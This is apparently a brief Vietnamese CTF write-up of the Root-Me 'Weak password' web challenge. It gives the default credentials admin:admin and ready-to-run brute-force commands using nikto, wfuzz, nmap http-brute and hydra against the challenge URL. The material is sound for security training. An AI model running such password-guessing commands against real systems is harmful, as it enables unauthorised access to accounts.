Published on

Weak password

Authors
  • avatar
    Name
    Kim Phu
    Twitter

#Bài này có rất nhiều cách:

Option1, test thử account 1 phát ăn luôn admin:admin

Option2, dùng 1 bash trong list dưới đây đều được:

  • nikto:
$ nikto -host http://challenge01.root-me.org/web-serveur/ch3/ 
  • wfuzz:
$ wfuzz -c -w /usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt --basic admin:FUZZ http://challenge01.root-me.org/web-serveur/ch3/ 
  • nmap:
$ nmap -d -vv -p 80 --script http-brute --script-args http-brute.path=/web-serveur/ch3/ challenge01.root-me.org
  • hydra:
$ hydra -L userList.txt -P passwordsList.txt 212.129.38.224 http-head /web-serveur/ch3/